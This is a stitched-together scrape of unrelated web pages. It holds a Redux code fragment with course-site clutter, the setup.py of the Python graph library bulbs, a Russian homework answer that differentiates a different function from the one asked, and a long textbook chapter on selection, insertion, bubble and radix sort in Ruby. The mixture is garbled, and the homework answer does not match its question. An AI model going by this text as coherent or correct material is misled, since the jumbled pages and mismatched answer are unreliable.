return state + 1;
default: return state;
}
}
export default counter;
src/reducers/index.js
import { combineReducers } from 'redux';
import users from './users';
import counter from './counter';
export default combineReducers({
users,
counter
});
src/actions/counter.js
import { INCREMENT } from '../constants/counter';
export const increment = () => {
return {
type: INCREMENT
}
};
src/constants/counter.js
export const INCREMENT = 'INCREMENT';
src/sagas/index.js
export function* helloSaga() {
console.log('Hello Saga!');
}
8 条回复
加微信(qiuzhi99666)入群官方服务号
随机课程
React & Redux 实战 Reminder Pro 项目
React & Redux 实战 Reminder Pro 项目
5 个视频31 分钟初级
Pro¥ 59.00¥ 47.20
Redux已完结
学员(167)
Luminous🌈 · 大乘罗志勃 · 真仙萎鳴咸一 · 真仙o欧洋 · 道祖qq894617385 · 练虚冀宇航 · 道祖jadee · 大乘spec · 元婴霞 · 大乘风间夜 · 道祖lhr_freeany · 大乘幻月瑶琴 · 真仙
最新动态
Luminous🌈 · 大乘学习到了8:37
罗志勃 · 真仙学习到了8:35
萎鳴咸一 · 真仙学习到了7:55
o欧洋 · 道祖学习到了7:54
qq894617385 · 练虚学习到了0:02
统计信息
学员: 16411
视频数量: 964
帖子数量: 415
© 汕尾市求知科技有限公司 | 粤ICP备19038915号 | 在线学员:121
Top
|
__label__pos
| 0.919918 |
Skip to content
HTTPS clone URL
Subversion checkout URL
You can clone with
or
.
Download ZIP
Tree: c306f53ce4
Fetching contributors…
Cannot retrieve contributors at this time
103 lines (91 sloc) 3.38 KB
"""
Bulbs
-----
Bulbs is a Python persistence framework for graph databases that
connects to Neo4j Server, Rexster, OrientDB, Lightsocket, and more.
"""
import sys
from setuptools import Command, setup, find_packages
class run_audit(Command):
"""Audits source code using PyFlakes for following issues:
- Names which are used but not defined or used before they are defined.
- Names which are redefined without having been used.
"""
description = "Audit source code with PyFlakes"
user_options = []
def initialize_options(self):
all = None
def finalize_options(self):
pass
def run(self):
import os, sys
try:
import pyflakes.scripts.pyflakes as flakes
except ImportError:
print("Audit requires PyFlakes installed in your system.")
sys.exit(-1)
dirs = ['bulbs', 'tests']
# Add example directories
#for dir in ['blog',]:
# dirs.append(os.path.join('examples', dir))
# TODO: Add test subdirectories
warns = 0
for dir in dirs:
for filename in os.listdir(dir):
if filename.endswith('.py') and filename != '__init__.py':
warns += flakes.checkPath(os.path.join(dir, filename))
if warns > 0:
print(("Audit finished with total %d warnings." % warns))
else:
print("No problems found in sourcecode.")
def run_tests():
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), 'tests'))
from bulbs_tests import suite
return suite()
# Python 3
install_requires = ['distribute', 'httplib2>=0.7.2', 'pyyaml>=3.10', 'six', 'pytz', 'omnijson']
if sys.version < '3':
install_requires.append('python-dateutil==1.5')
else:
# argparse is in 3.2 but not 3.1
install_requires.append('argparse')
install_requires.append('python-dateutil>=2')
setup (
name = 'bulbs',
version = '0.3.8',
url = 'https://github.com/espeed/bulbs',
license = 'BSD',
author = 'James Thornton',
author_email = '[email protected]',
description = 'A Python persistence framework for graph databases that '
'connects to Neo4j Server, Rexster, OrientDB, Lightsocket.',
long_description = __doc__,
keywords = "graph database DB persistence framework rexster gremlin cypher neo4j orientdb",
packages = find_packages(),
include_package_data=True,
zip_safe=False,
platforms='any',
install_requires=install_requires,
classifiers = [
"Programming Language :: Python",
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.0',
'Programming Language :: Python :: 3.1',
'Programming Language :: Python :: 3.2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 2.6',
"Development Status :: 3 - Alpha",
"Environment :: Web Environment",
"Intended Audience :: Developers",
"License :: OSI Approved :: BSD License",
"Operating System :: OS Independent",
"Topic :: Database",
"Topic :: Database :: Front-Ends",
"Topic :: Internet :: WWW/HTTP",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: System :: Distributed Computing",
],
cmdclass={'audit': run_audit},
test_suite='__main__.run_tests'
)
Jump to Line
Something went wrong with that request. Please try again.
|
__label__pos
| 0.962327 |
F (x) = -4 х^2+16 х-4/5 х^2
0
Ответы (1)
1. 31 января, 09:28
0
Найдём производную нашей данной функции: f (х) = x^4 - 4x^3 - 8x^2 + 13.
Воспользуемся основными правилами и формулами дифференцирования:
(x^n) ' = n * x^ (n-1).
(с) ' = 0, где с - const.
(с * u) ' = с * u', где с - const.
(u ± v) ' = u' ± v'.
(uv) ' = u'v + uv'.
y = f (g (x)), y' = f'u (u) * g'x (x), где u = g (x).
То есть, производная данной нашей функции будет следующая:
f (x) ' = (x^4 - 4x^3 - 8x^2 + 13) ' = (x^4) ' - (4x^3) - (8x^2) ' + (13) ' = 4 * x^3 - 4 * 3 * x^2 - 8 * 2 * x + 0 = 4x^3 - 12x^2 - 16x.
Ответ: Производная данной нашей функции f (x) ' = 4x^3 - 12x^2 - 16x.
Знаешь ответ на этот вопрос?
Сомневаешься в правильности ответа?
Получи верный ответ на вопрос 🏆 «F (x) = -4 х^2+16 х-4/5 х^2 ...» по предмету 📕 Математика, используя встроенную систему поиска. Наша обширная база готовых ответов поможет тебе получить необходимые сведения!
Найти готовые ответы
|
__label__pos
| 0.997296 |
4
$\begingroup$
I am working with a very large system of non-linear, 1st order coupled ODEs which seem to be stiff. I have been trying to solve them via NDSolve with several methods, finding StiffnessSwitching to be the one that best fits my problem. However, for certain values of the parameters, Mathematica complains about not being able to obtain an explicit expression for the ODEs. I have been able to solve this by switching the Method to Method->{"EquationSimplification"->"Solve"}. However, when I do this, I cannot specify that I still want the numerical method to be StiffnessSwitching. I have tried to use Method->{"EquationSimplification"->"Solve", "StiffnessSwitching"}, but it doesn't work. How can I use these two methods (or, as I understand it, the method for solving the ODEs and the one that simplifies the expressions?
$\endgroup$
1 Answer 1
5
$\begingroup$
Just set
Method -> {"TimeIntegration" -> "StiffnessSwitching",
"EquationSimplification" -> Solve}
BTW this is mentioned in Details and Options section of document of NDSolve/NDSolveValue, I admit this isn't immediately obvious, though.
$\endgroup$
Your Answer
By clicking “Post Your Answer”, you agree to our terms of service and acknowledge you have read our privacy policy.
Not the answer you're looking for? Browse other questions tagged or ask your own question.
|
__label__pos
| 0.803469 |
JS: Understand JS Array
By Xah Lee. Date: . Last updated: .
This page is advanced understanding of JavaScript array.
For basics of JavaScript array, such creating array and access elements, see: JS: Array Basics.
JavaScript array is a object data type, with a magic property key "length", and special treatement of string property keys "0", "1", "2", etc.
[see JS: Object Overview]
By understanding that array is just a special JavaScript object, you avoid lots confusion and mysterious bugs from using JavaScript array.
Array is Object
JavaScript Array is of object data type. Meaning, it is a key/value pairs. For example, we can add property to array:
console.log ( typeof [3,4] === "object"); // true
// array is a object, you can add properties to it
const aa = [3,4];
aa.xx = 7;
console.log ( Reflect.ownKeys ( aa ) ); // [ '0', '1', 'length', 'xx' ]
Array also has the attribute “extensible”, just like other objects. [see JS: Prevent Adding Property]
console.log(
Object.isExtensible( [3,4] )
); // true
Index vs Property Key
The index of array is just string property key.
const rr = [3,4];
console.log( rr.hasOwnProperty("0") ); // true
console.log( rr.hasOwnProperty("1") ); // true
[see JS: Property Dot Notation / Bracket Notation]
Accessing Array with Non-Existent Index
Accessing array with non-existent index returns undefined, just like accessing a object with non-existent property.
// accessing array with non-existent index results 「undefined」
const arr = [3];
console.log(arr[200] === undefined); // true
Check If a Object is Array
Call Array.isArray(value)
[see JS: Array.isArray]
Array Length Special Property
Array has a length property. It's a special property. The “length” property is automatically updated when array elements are added or removed using array methods.
Array length can be set. If you set it, the array will be lengthened or shortened.
// creating a sparse array by setting the length property
const aa = ["a", "b"];
// set the length property beyond the last index
aa.length = 3;
console.log(aa.length); // 3
console.log( Object.getOwnPropertyNames(aa)); // [ '0', '1', 'length' ]
console.log(aa); // [ 'a', 'b', ]
// truncating a array by setting its length
const aa = ["a", "b", "c"];
console.log(aa.length); // 3
aa.length = 1;
console.log(aa.length); // 1
console.log(aa[1]); // undefined
console.log( Object.getOwnPropertyNames(aa)); // [ '0', 'length' ]
[see JS: Array.prototype.length]
Array Methods
Common array operations should be done using array methods.
To add/remove element(s) in middle, use splice. [see JS: Array.prototype.splice]
Warning: Never use delete to remove element in a array, because that creates a sparse array. [see JS: Sparse Array]
For more array methods, see:
JS: Array.prototype
String to Array
str.split(…) → split string and return a array.
[see JS: String.prototype.split]
Max Number of Elements
The max number of elements is 2^32 - 1 (which is 4 294 967 295).
When the index is a number between 0 to 2^32-2, inclusive, it is treated as array index, else it's just a property key.
// When array index is beyond 2^32 - 2, it is treated as a property key.
const hh = ["a"];
hh[1] = "b";
hh[2**32] = "c";
console.log ( 2**32 === 4294967296 ); // true
console.log(hh); // [ 'a', 'b', '4294967296': 'c' ]
// note, the c is printed differently
console.log(
Object.getOwnPropertyNames(hh)
); // [ '0', '1', 'length', '4294967296' ]
// all are property keys
Note: if you create a array with just 1,000,000 items, the browser will become not responsive.
JS Array
1. Understand JS Array
2. Create Array
3. Sparse Array
4. Array-Like Object
5. Array How-To
Liket it? I spend 2 years writing this tutorial. Help me spread it. Tell your friends. Or, Put $5 at patreon.
Or, Buy JavaScript in Depth
If you have a question, put $5 at patreon and message me.
Web Dev Tutorials
1. HTML
2. Visual CSS
3. JS in Depth
4. JS Object Ref
5. DOM Scripting
6. SVG
7. Blog
|
__label__pos
| 0.732916 |
Cómo comparar una cadena en un arreglo usando Java
Por sue smith
Las aplicaciones de Java usan la clase string para almacenar secuencias de texto.
Jupiterimages/Comstock/Getty Images
La clase string de Java proporciona un método para revisar si dos valores de cadena son iguales. Usando este método en conjunto con un ciclo y una instrucción condicional, tu programa puede obtener el índice del elemento que sea igual a una cadena específica en un arreglo. Para comparar la cadena primero necesitas implementar un ciclo para iterar a través de la estructura del arreglo. Cada vez que el ciclo haga una iteración, tu código puede comparar el valor de la cadena actual con el que estés buscando. El ciclo puede continuar hasta que encuentre la cadena o hasta que llegue al final de la estructura.
Paso 1
Crea un arreglo de cadenas en tu programa. Si ya tienes uno, puedes usarlo. De lo contrario puedes crear uno y generar una instancia del mismo usando el siguiente código:
String[] words = {"manzana", "plátano", "naranja", "mango", "durazno"};
La estructura de tipo arreglo ahora tiene cinco elementos en ella, y cada uno almacena una sola palabra. Especifica la cadena que quieras comparar como una variable usando el siguiente código:
String match = "mango";
Modifica el valor de la cadena para reflejar el texto que estés buscando y compararlo con los de tu arreglo.
Paso 2
Realiza iteraciones a través de tu arreglo. Agrega el siguiente código creando una variable para realizar un seguimiento del índice comparado en el arreglo cuando tu programa lo localice:
int matchIndex = -1;
Al asignar un número negativo a esta variable sabrás si tu programa encontró la cadena o no. Agrega el siguiente esquema de ciclo para buscar a través de tu arreglo: for(int w=0; w<words.length; w++) { //revisa la cadena }
Este ciclo realizará una iteración por cada elemento de tu arreglo. Dentro del ciclo puedes comparar el elemento actual de tipo cadena con el que estés intentando encontrar.
Paso 3
Compara el elemento actual del arreglo con tu cadena buscada. Agrega la siguiente instrucción condicional dentro de tu ciclo:
if(words[w].equals(match)) { //especifica qué hacer al encontrar la cadena }
Este código invoca al método equals de la clase string. Si el elemento actual del arreglo es igual a la cadena buscada, la prueba condicional dará como resultado un valor verdadero. Dentro de la instrucción condicional puedes colocar comandos para cuando la cadena haya sido encontrada.
Paso 4
Especifica qué pasará cuando Java encuentre tu cadena. Agrega el siguiente código dentro de tu instrucción condicional if:
matchIndex = w; break;
Este código iguala la variable match de tipo entero con el valor del índice del elemento del arreglo que sea igual a la cadena deseada. Una vez que hayas encontrado el valor no es necesario que el ciclo continúe ejecutándose, por lo que la instrucción break lo detendrá.
Paso 5
Usa el valor del índice encontrado en tu programa. Tu código puede usar el valor entero después de que el ciclo for termine de ejecutarse. El siguiente código de ejemplo escribe el valor en la consola de salida para hacer pruebas:
System.out.println(matchIndex);
Experimenta con el código cambiando el valor de la cadena que quieras buscar en el arreglo.
|
__label__pos
| 0.632386 |
Questions tagged [uri]
The tag has no usage guidance.
Filter by
Sorted by
Tagged with
0
votes
0answers
20 views
URI based conversion routing?
When a payment or donation is sent, is there a way to automatically route conversions with a conversion HINT or DEMAND for a payment processor? Eg. pay me to my customCoin01 from your mainstream ...
4
votes
2answers
118 views
Why do bitcoin: URLs not use "//", breaking "clickability"?
I want to have something like this in a plaintext e-mail: Pay directly: bitcoin:addresshere?amount=0.001&label=Blablabla&message=Blablabla But if I do that, it won't be "clickable", ...
0
votes
1answer
175 views
how to convert URI into Bip21
i am trying to convert the URI into BIP21 currently i am generating URI from bitcoinj library, but i want it to be on BIP21 Standard. i have read many articles but didn't found any solution
7
votes
1answer
184 views
How does a request link work?
When I share an request as a link it can look like this: bitcoin:1474awqSNomvEjS2vPv4Pueq3WkrMaEFfP?amount=1 I've got some basic questions about request link: Is just my address and the value sent ...
3
votes
0answers
381 views
bitcoin:uri for sending payments to multiple addresses
Lets say I want a donate bitcoin button/QR code to send to multiple recipients in different ratios. As in send 50% to wallet 1. Send 25% to wallet 2. Send 25% to wallet 3. Is there any way to do ...
3
votes
1answer
318 views
Does the bitcoin URI message parameter have character limits?
Is there a limit to how many characters are allowed in the message parameter of a BIP21 URI? I tried searching on the subject, but found nothing about it.
4
votes
1answer
579 views
Correct syntax for Bitcoin URI: bitcoin://1xxx-etc or bitcoin:1xxx-etc?
To make clickable Bitcoin links, to let people easily pay from their wallet, I see two formats being used in various situations: bitcoin:14bTZTm1uX2uVAqHr62oyGFEkwy2mNLbVb?amount=0.25 and bitcoin://...
3
votes
1answer
197 views
Is the bicoin: URI scheme an URL scheme as well?
Hi given that bitcoin:1335STSwu9hST4vcMRppEPgENMHD2r1REK is a valid URI. Is it a valid URL (locator!) as well? I tend to say yes when I compare sending bitcoins to a bitcoin: URI with sending mails to ...
0
votes
2answers
382 views
Can I pass values over a bitcoin bip 70 URI?
is it possible to add arguments such as BTC amount to a bip 70 URI, something like: bitcoin:?r=http://127.0.0.1:8000/paymentobject/?amount=10 I already tried with the backwards compatible URI: ...
0
votes
1answer
203 views
Is it possible to create a Bitcoin URI with multiple outputs?
The Bitcoin URI scheme allows for the creation of single-click payment request, using the format bitcoin:<address>&amount=<amount> such as bitcoin:1AzGoMQfrQ7fYaE12dAvEVkke8111rxwCm&...
3
votes
0answers
703 views
Is there a way to specify an invoice ID in Ripple URI? [closed]
In Ripple payment transactions we can specify an invoice ID that is used to make payments for a particular invoice. Is there a way to specify such an invoice ID in Ripple's URI scheme?
|
__label__pos
| 0.769834 |
Drone CLI won't convert .drone.star file to .drone.yml file
When I run drone starlark --source $FILE --stdout I get this error .drone.star:8:24: got string literal, want '}' and I’m using the example at the top of this page.
What am I doing wrong?
EDIT:
I’m using drone CLI version 1.2.1
For those trying to figure out the answer to this, the example is missing commas in the list:
def main(ctx):
return {
'kind': 'pipeline',
'name': 'build',
'steps': [
{
'name': 'build',
'image': 'alpine',
'commands': [
'echo hello world'
]
}
]
}
If you run this script with the same command above it will translate it into yaml.
|
__label__pos
| 0.961148 |
Sorting and Searching - Computer Science Programming Basics in Ruby (2013)
Computer Science Programming Basics in Ruby (2013)
Chapter 7. Sorting and Searching
IN THIS CHAPTER
§ Popular sorting algorithms
§ Analyzing the complexity of algorithms
§ Search algorithms
7.1 Introduction
Entire books have been written on sorting and searching with computers. We introduce the topic here only to stress, once again, that writing programs is not the target of computer science; solving problems efficiently and effectively with the limited resources found in a computer is the real goal.
It turns out that computers spend a tremendous amount of time sorting. Just as we discussed different algorithms for computing prime numbers, we will now discuss three basic, comparison-based sorting algorithms. None of these are truly efficient. Efficient comparison-based sorting is beyond the scope of this introductory text. Additionally, we introduce a radix sort, one that capitalizes on the nature of the elements stored, rather than individual comparison between elements.
The sorting problem is described as follows:
Given a list of elements provided as input in any arbitrary order, these elements having an established ordinal value, namely a collating sequence, reorder them so that they appear according to their ordinal value from lowest to highest.
GEM OF WISDOM
A common conjecture is that computers around the world spend the majority of their time sorting. Hence, it is difficult to talk much about computer science without talking about sorting. There are many sorting approaches.
For example, consider the following list of numbers as input: 5, 3, 7, 5, 2, 9. A sorted output corresponding to this input is: 2, 3, 5, 5, 7, 9.
In the following subsections, we will describe three comparison-based sorting algorithms and briefly compare them to demonstrate how to determine which one is the best. The implementation of each sorting algorithm will be presented in the context of grades for a final exam in a programming class. We want to provide a sorted list of the final scores, shown as percentages, to the students given an unsorted list. In each case, we describe the algorithm in plain language and then provide a corresponding Ruby implementation. Once the algorithms are presented, we discuss how we measure the notion of “best.”
7.1.1 Selection Sort
Selection sort is the simplest to explain and the most intuitive. Imagine you have a deck of cards in your hand, and they have numbers on them. If you wanted to sort them, one easy way is to just select the smallest number in the deck and bring it to the top. Now repeat the process for all cards other than the one that you just did. If you repeated this process until the entire deck was selected, you would end up with a sorted deck of cards. The algorithm just described is selection sort.
The selection sort algorithm is formally defined as follows:
1. Start with the entire list marked as unprocessed.
2. Find the smallest element in the yet unprocessed list; swap it with the element that is in the first position of the unprocessed list; reset the unprocessed list starting with the second element.
3. Repeat step 2 for an additional n – 2 times for the remaining n – 1 numbers in the list. After n – 1 iterations, the nth element, by definition, is the largest and is in the correct location.
We’ve already discussed arrays, so our Ruby code will first initialize an array and populate it with randomly generated numbers. The rand(x) function, where x is an integer, returns a randomly generated integer in the range [0, x].
The Ruby code for the selection sort is given in Example 7-1.
Example 7-1. Code for selection sort
1 # Code for selection sort
2 # 35 students in our class
3 NUM_STUDENTS = 35
4 # Max grade of 100%
5 MAX_GRADE = 100
6 num_compare = 0
7 arr = Array.new(NUM_STUDENTS)
8
9 # Randomly populate arr
10 for i in (0..NUM_STUDENTS - 1)
11 # Maximum possible grade is 100%, keep in mind that rand(5) returns
possible values 0-4, so
we must add 1 to MAX_GRADE
12 arr[i] = rand(MAX_GRADE + 1)
13 end
14
15 # Output current values of arr
16 puts "Input list:"
17 for i in (0..NUM_STUDENTS - 1)
18 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
19 end
20
21 # Now let's use a selection sort. We first find the lowest number in the
22 # array and then we move it to the beginning of the list
23 for i in (0..NUM_STUDENTS - 2)
24 min_pos = i
25 for j in (i + 1)..(NUM_STUDENTS - 1)
26 num_compare = num_compare + 1
27 if (arr[j] < arr[min_pos])
28 min_pos = j
29 end
30 end
31 # Knowing the min, swap with current first element (at position i)
32 temp = arr[i]
33 arr[i] = arr[min_pos]
34 arr[min_pos] = temp
35 end
36
37 # Now output the sorted array
38 puts "Sorted list:"
39 for i in (0..NUM_STUDENTS - 1)
40 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
41 end
42
43 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 3 and 5 declare important constants that represent the problem. If the number of students in the class changes, we have to change only one constant.
§ Line 7 initializes an array called arr that will hold the randomly generated numbers and ultimately the sorted list.
§ Lines 10–13 step through the array arr and initialize each element to a randomly generated number in the range [0, MAX_GRADE].
§ Lines 17–19 output the initial list so that you can examine its contents. Comment this out if you want to try a large set of numbers to sort.
§ Line 23 is where the real work begins.
§ Lines 23–35, the outer loop, ensure that we repeat the core of step 1 n – 2 times.
§ Line 24 is the first line of finding the minimum value in the list. We set the first position of the unprocessed list to min_pos.
§ Lines 25–30 iterate through the rest of the unprocessed list to find a value smaller than the item located at position min_pos. If we find such a value, as in line 27, we update the value of min_pos as in line 28. Once we have found the minimum value, we perform the latter part of step 2 and swap it with the first position in the unprocessed list. The outer loop repeats until the entire list is sorted.
§ Line 26 counts the number of comparisons performed and is simply here for pedagogical purposes to determine the best sorting algorithm.
§ Lines 38–43 output the sorted list and the number of comparisons.
GEM OF WISDOM
Selection sort works by repeatedly finding the lowest remaining number and bringing it to the top. Selection sort is explained first since intuitively it is the easiest to understand. If you are confused by Example 7-1, come back to it after a break. Please do not just skip past it and hope that the rest of the chapter gets easier. It does not.
7.1.2 Insertion Sort
Insertion sort is a little trickier than selection sort. Imagine once again that you have a deck of cards and that you are given an additional card to add to this deck. You could start at the top of your deck and look for the right place to insert your new card. If you started with only one card and gradually built the deck, you would always have a sorted deck.
The insertion sort algorithm is formally defined as follows:
Step 1: Consider only the first element, and thus, our list is sorted.
Step 2: Consider the next element; insert that element into the proper position in the already-sorted list.
Step 3: Repeat this process of adding one new number for all n numbers.
The Ruby code for an insertion sort is given in Example 7-2.
GEM OF WISDOM
Insertion sort works by leaving the first element alone and declaring it as a sorted list of size 1. The next element is inserted into the right position in our newly sorted list (either above or below the element we started with). We continue by taking each new element and inserting it in the right position in our list. By the end, all of our insertions result in a single sorted list.
Example 7-2. Code for insertion sort
1 # Code for insertion sort
2 # Declare useful constants
3 NUM_STUDENTS = 35
4 MAX_GRADE = 100
5 num_compare = 0
6 arr = Array.new(NUM_STUDENTS)
7
8 # Randomly populate arr
9
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 # Output randomly generated array
15 puts "Input array:"
16 for i in (0..NUM_STUDENTS - 1)
17 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
18 end
19
20 # Now let's use an insertion sort
21 # Insert lowest number in the array at the right place in the array
22 for i in (0..NUM_STUDENTS - 1)
23 # Now start at current bottom and move toward arr[i]
24 j = i
25 done = false
26 while ((j > 0) and (! done))
27 num_compare = num_compare + 1
28 # If the bottom value is lower than values above it, swap it until it
29 # lands in a place where it is not lower than the next item above it
30 if (arr[j] < arr[j - 1])
31 temp = arr[j - 1]
32 arr[j - 1] = arr[j]
33 arr[j] = temp
34 else
35 done = true
36 end
37 j = j - 1
38 end
39 end
40
41 # Now output the sorted array
42 puts "Sorted array:"
43 for i in (0..NUM_STUDENTS - 1)
44 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
45 end
46 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 22–39 contain the core outer loop that inserts the next number in the list into the right place.
§ Lines 26–38 contain the inner loop that swaps numbers starting at the beginning of the unsorted list until the number falls into the right place.
§ Once the number is in the right place, the flag done is set to true in line 35.
7.1.3 Bubble Sort
Bubble sort is based on percolation; that is, elements successively percolate to the right order by swapping neighboring elements. This is like continuously and repetitively comparing adjacent pairs of cards within your deck.
The bubble sort uses two relatively straightforward loops. The outer loop ensures that the core process in the inner loop is repeated n – 1 times. The core process is to loop through the list and, for any successive elements in the list, check the following: if the value we are currently examining is larger than the next member of the list, simply swap those two values. Thus, each value will fall down the list into its proper place. Essentially, small values “bubble” to the top of the list, hence the name “bubble sort.”
The bubble sort algorithm is formally defined as follows:
Step 1: Loop through all entries of the list.
Step 2: Compare each entry to all successive entries and swap entries if they are out of order.
Step 3: Repeat this process a total of n – 1 times.
The Ruby code is given in Example 7-3. An efficiency optimization (not shown) terminates the processing once no swaps occur. This conceptually does not affect the efficiency of the sort, but typically does so in practice.
GEM OF WISDOM
Bubble sort is a little tricky. It is not how people would likely sort. The premise is that if we repeatedly place successive elements in order, eventually the smallest element will bubble up to the top. It is clever and sometimes is more efficient than the other algorithms we have discussed. So it is worth knowing. Take some time and step through this code.
Example 7-3. Code for bubble sort
1 # Code for bubble sort
2 NUM_STUDENTS = 35
3 # Max grade of 100%
4 MAX_GRADE = 100
5 num_compare = 0
6 arr = Array.new(NUM_STUDENTS)
7
8 # Randomly put some final exam grades into arr
9
10 for i in (0..NUM_STUDENTS - 1)
11 arr[i] = rand(MAX_GRADE + 1)
12 end
13
14 # Output randomly generated array
15 puts "Input array:"
16 for i in (0..NUM_STUDENTS - 1)
17 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
18 end
19
20 # Now let's use bubble sort. Swap pairs iteratively as we loop through the
21 # array from the beginning of the array to the second-to-last value
22 for i in (0..NUM_STUDENTS - 2)
23 # From arr[i + 1] to the end of the array
24 for j in ((i + 1)..NUM_STUDENTS - 1)
25 num_compare = num_compare + 1
26 # If the first value is greater than the second value, swap them
27 if (arr[i] > arr[j])
28 temp = arr[j]
29 arr[j] = arr[i]
30 arr[i] = temp
31 end
32 end
33 end
34
35 # Now output the sorted array
36 puts "Sorted array:"
37 for i in (0..NUM_STUDENTS - 1)
38 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
39 end
40 puts "Number of Comparisons ==> " + num_compare.to_s
§ Lines 22–33 contain the core algorithm.
§ Lines 24–32 contain the inner loop that swaps all elements that are larger than their next successive element.
7.1.4 Radix Sort
The radix sort is very different from the others. The sorting algorithms we have discussed compare the entire number with other numbers in the list and ultimately make a decision as to where an element belongs based on its number. The radix sort works by sorting the list by each successive digit. The idea is that if we first sort all the units or ones digits in a list and then sort all the tens digits and so on, ultimately, when we run out of digits, we will have a sorted list. Sorting by a single digit can be done by running one of the three sorting algorithms we have discussed. It can also be done by storing all values that match the digit in an array. We use this method so that the algorithm ends up looking very different from the algorithms we have already discussed.
Let’s make sure we are clear about the idea of sorting values one digit at a time.
Consider a list of values:
47
21
90
Now let’s sort them based only on their rightmost digit. The rightmost digits are 7, 1, 0. We can sort these as 0, 1, 7. Now let’s look at our list:
90
21
47
It is clearly not in sorted order (but at least the rightmost digit is nicely sorted).
Now we move on to the next digit. It is 9, 2, 4. Sorting this, we obtain 2, 4, 9. Here is the list:
21
47
90
It is now sorted. You may wonder why we start at the rightmost digit. The reason is that we know every number has at least one digit, so we can start there. Some numbers may be bigger or smaller than others, so we have to start at the right and work our way to the left. Now let’s consider the use of a hash. For the same example, we start with:
47
21
90
GEM OF WISDOM
In radix sort, unlike the other sorting algorithms discussed, no comparison of elements is made. Instead, radix sort repeatedly sorts elements digit by digit, commencing from the rightmost digit until the last digit is done. Radix sort illustrates that there are numerous unique approaches to the sorting problem; thus, investigate alternatives rather than simply selecting the first solution that comes to mind.
Now let’s make a hash bucket for each possible digit, so we have a bucket for 0, a bucket for 1, and finally a bucket for 9.
We read the rightmost digit and put it into the correct bucket. This results in:
0 → 90
1 → 21
7 → 47
We now read the buckets in order from 0 to 9 and output all values in the bucket to continue the sort. This yields:
90
21
47
This is the same place we were at when we sorted the rightmost digit. This works because we process the hash buckets in order from 0 to 9. Now we repopulate our hash buckets with the tens digit. We obtain:
2 → 21
4 → 47
9 → 90
Reading the buckets in order gives us our sorted result of 21, 47, 90.
To review, we are building a hash of the following form:
0 → [Array of matching values for the digit 0]
1 → [Array of matching values for the digit 1]
...
9 → [Array of matching values for the digit 9]
It can be seen that our hash of 10 entries (one for each digit) points to an array of matches for that specific digit. Note that this works because we know we are sorting only one digit at a time, and we know the full set of valid digits.
The code for radix sort is shown in Example 7-4.
Example 7-4. Code for radix sort
1 # Code for radix sort
2 NUM_STUDENTS = 35
3 MAX_GRADE = 100
4 arr = Array.new(NUM_STUDENTS)
5
6 # Randomly put some grades into the array *as strings*
7 for i in (0..NUM_STUDENTS - 1)
8 arr[i] = rand(MAX_GRADE + 1).to_s
9 end
10
11 # Output array and find the maximum number of digits in the generated array
12 puts "Input array: "
13 max_length = 0
14 for i in (0..NUM_STUDENTS - 1)
15 puts "arr[" + i.to_s + "] ==> " + arr[i]
16 if arr[i].length > max_length
17 max_length = arr[i].length
18 end
19 end
20 puts "Max length ==> " + max_length.to_s
21
22 # Add 0 padding based on the max length, simplifying the sort algorithm
23 for i in (0..NUM_STUDENTS - 1)
24 arr[i] = arr[i].rjust(max_length, "0")
25 end
26
27 # Now let's use a radix sort. Go through each digit and
28 # add each element to an array corresponding to the digits.
29 for i in (0..max_length - 1)
30 # Clear out and reset the bucket
31 buckets = Hash.new()
32 for j in 0..9
33 buckets[j.to_s] = Array.new()
34 end
35
36 # Add each number to its respective digit bucket
37 for j in 0..NUM_STUDENTS - 1
38 num = arr[j]
39 digit = num[max_length - 1 - i]
40 buckets[digit].push(num)
41 end
42 # Flatten the buckets into a one-dimensional array
43 arr = buckets.values.flatten
44 end
45
46 # Now output the sorted array
47 puts "Sorted array:"
48 for i in (0..NUM_STUDENTS - 1)
49 puts "arr[" + i.to_s + "] ==> " + arr[i].to_s
50 end
§ Lines 2–9 initialize the list to be sorted as we have described in all the other sorts. Notice that we are storing the numbers as strings, rather than integers, so we can easily access the individual digits of the number. The list is initialized with random values.
§ One addition is a loop, on lines 23–25, that right-justifies the array elements in the list using the Ruby rjust function. This pads the numbers in the list with leading zeros.
Since we are going to loop through the entries in the list digit by digit, it is crucial that all numbers contain the same number of digits. Padding with zeros in the front of the number is the best way to ensure that all numbers are of the same length.
§ Lines 29–44 contain the outer loop that processes the list one digit at a time. For each digit, the entire list will be traversed.
§ On lines 31–34, we reset the hash named bucket that we discussed in the description of the algorithm.
§ Lines 37–41 are the inner loop that adds each number to its corresponding bucket.
§ Line 43 uses two functions, values and flatten, to give a new array representing the values sorted according to the current digit we are processing. The values function returns an array of all the values in a hash, which is analogous to the keys function discussed in Section 6.3, “Hashes.” The flatten function takes a two-dimensional array and returns a one-dimensional array with the same elements, as shown in the following irb session:
§ irb(main):001:0> arr = [[1, 2], [3, 4], [5, 6]]
§ => [[1, 2], [3, 4], [5, 6]]
§ irb(main):002:0> arr.flatten
=> [1, 2, 3, 4, 5, 6]
7.2 Complexity Analysis
To evaluate an algorithm, a common approach is to analyze its complexity. That is, we essentially count the number of steps involved in executing the algorithm.
An intuitive explanation of complexity analysis is the following. We caution you that our explanation is clearly an oversimplification, but it suffices for our purposes. Given a certain input size, assuming that to process a single element takes one unit of time, how many units of time are involved in processing n elements of input? This is essentially what complexity analysis attempts to answer. As can be seen, it is unnecessary to determine exactly the computer time involved in each step; instead, we simply determine the number of logical steps that occur in a given algorithm. In reality, we can have families of steps (say, one family is addition and subtraction, the other multiplication and division). We then count how many steps of each family are required.
